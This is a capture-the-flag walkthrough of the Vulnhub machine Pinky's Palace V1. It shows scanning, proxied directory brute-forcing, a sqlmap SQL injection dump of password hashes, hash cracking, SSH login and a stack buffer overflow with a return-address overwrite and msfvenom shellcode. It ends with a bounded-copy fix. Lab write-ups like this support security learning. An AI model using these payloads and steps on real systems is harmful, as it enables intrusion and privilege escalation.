[Vulnhub] Pinkys-PalaceV1 Squid http proxy+SQI+BOF
Information gathering
| IP Address | Opening Ports |
|---|---|
| 192.168.8.106 | TCP:8080,31337,64666 |
$ nmap -p- 192.168.8.106 --min-rate 1000 -sC -sV
```
PORT      STATE SERVICE    VERSION
8080/tcp  open  http       nginx 1.10.3
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.10.3
31337/tcp open  http-proxy Squid http proxy 3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.23
64666/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)
|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)
|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
$ curl http://127.0.0.1:8080 -x 192.168.8.106:31337
Directory brute-forcing (through the Squid proxy on 31337, since 8080 only answers to 127.0.0.1)
$ dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.8.106:31337
$ gobuster dir -u "http://127.0.0.1:8080/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt --proxy http://192.168.8.106:31337
http://127.0.0.1:8080/littlesecrets-main/
SQLi
$ sqlmap --proxy=http://192.168.8.106:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump users
```
+-----+----------------------------------+-------------+
| uid | pass                             | user        |
+-----+----------------------------------+-------------+
| 1   | f543dbfeaf238729831a321c7a68bee4 | pinky       |
| 2   | d60dffed7cc0d87e1f4a11aa06ca73af | pinkymanage |
+-----+----------------------------------+-------------+
```
$ hashcat -m 0 -a 0 'd60dffed7cc0d87e1f4a11aa06ca73af' /usr/share/wordlists/rockyou.txt --force
username:pinkymanage
password:3pinkysaf33pinkysaf3
SSH
$ ssh pinkymanage@192.168.8.106 -p 64666
pinkymanage@pinkys-palace:~$ cat /var/www/html/littlesecrets-main/ultrasecretadminf1l35/note.txt
pinkymanage@pinkys-palace:~$ cat /var/www/html/littlesecrets-main/ultrasecretadminf1l35/.ultrasecret|base64 -d
$ ssh -i ./id_rsa pinky@192.168.8.106 -p 64666
Privilege escalation & BOF
Method 1
$ gdb -q ./adminhelper
(gdb) break main
(gdb) run 1
(gdb) jump spawn
(gdb) info functions spawn
(gdb) run $(python -c "print 'A'*72")
Testing shows the buffer overflows at an offset of 72 bytes.
(gdb) run $(python -c "print 'A'*72+'B'*4")
(gdb) run $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55\x00\x00'")
$ ./adminhelper $(python -c "print 'A'*72+'\xd0\x47\x55\x55\x55\x55\x00\x00'")
99975cfc5e2eb4c199d38d4a2b2c03ce
Method 2
$ msfvenom -a x64 -p linux/x64/exec CMD=/bin/sh -b '\x00\x0b\x0d\x0a\x18\x0c\x23\x24\x28\x29' | hexdump -v -e '"\\\x" 1/1 "%02x"'
$ export maptnh=`python -c 'print "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xa1\x12\x80\xb5\xc8\x09\xbf\x96\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe9\xaa\xaf\xd7\xa1\x67\x90\xe5\xc9\x12\x19\xe5\x9c\x56\xed\xf0\xc9\x3f\xe3\xe1\x96\x5b\x57\x9e\xa1\x12\x80\x9a\xaa\x60\xd1\xb9\xd2\x7a\x80\xe3\x9f\x5d\xe1\xfc\x9a\x4a\x8f\xb0\xc8\x09\xbf\x96"'`
```c
/* getenv.c: print where an environment variable will sit on the stack of the target program */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
    char *ptr;
    if (argc < 3) { printf("Usage: %s <env var> <target program>\n", argv[0]); exit(0); }
    ptr = getenv(argv[1]);
    if (!ptr) { fprintf(stderr, "%s is not set\n", argv[1]); return 1; }
    /* the target's argv[0] length differs from ours; each byte of difference shifts the stack by two */
    ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;
    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}
```
$ gcc -o getenv getenv.c
$ ./getenv maptnh ~/adminhelper
$ ~/adminhelper $(python -c "print 'A'*72+'\xaf\xee\xff\xff\xff\x7f'")
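Both methods above work because adminhelper copies its argument into a fixed stack buffer with no length check. As an added example that is not code from the writeup or from the Pinky's Palace VM, the block below shows that unbounded-copy pattern next to a bounded copy that rejects oversized input; the 64-byte buffer size, the function names and the padding helper are assumptions (the writeup only shows the return address being reached at offset 72, consistent with 64 bytes of buffer plus 8 bytes of saved rbp).

```c
/* Added example (not from the writeup): the unbounded-copy pattern behind the
 * adminhelper overflow next to a bounded version that rejects oversized input.
 * The 64-byte buffer is an assumption: the writeup shows the saved return
 * address being reached at offset 72 (64 bytes of buffer + 8 bytes saved rbp). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 64

/* Vulnerable pattern: strcpy does not know how big buf is, so anything longer
 * than 63 bytes plus NUL runs past the buffer into saved rbp and the return
 * address. Kept only for contrast; never call it with untrusted input. */
size_t unchecked_copy(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);
    return strlen(buf);
}

/* Hardened copy: refuse anything that does not fit including the terminator,
 * instead of silently truncating (strncpy) or overflowing (strcpy). */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (n >= dst_size)
        return -1;            /* would overflow: reject */
    memcpy(dst, src, n + 1);  /* n bytes plus the NUL */
    return (int)n;
}

/* Stand-in for adminhelper's argument handling: 1 = accepted, 0 = rejected. */
int admin_helper_check(const char *input) {
    char buf[BUF_SIZE];
    return bounded_copy(buf, sizeof buf, input) < 0 ? 0 : 1;
}

/* Build n bytes of 'A' (like the writeup's python -c "print 'A'*72") and
 * feed the constructed input through the hardened check. */
int check_padding(size_t n) {
    char *pad = malloc(n + 1);
    if (!pad) return -1;
    memset(pad, 'A', n);
    pad[n] = '\0';
    int r = admin_helper_check(pad);
    free(pad);
    return r;
}
```

With the bounded copy, the 72-byte padding that reaches the return address in the writeup is rejected outright rather than being written past the buffer.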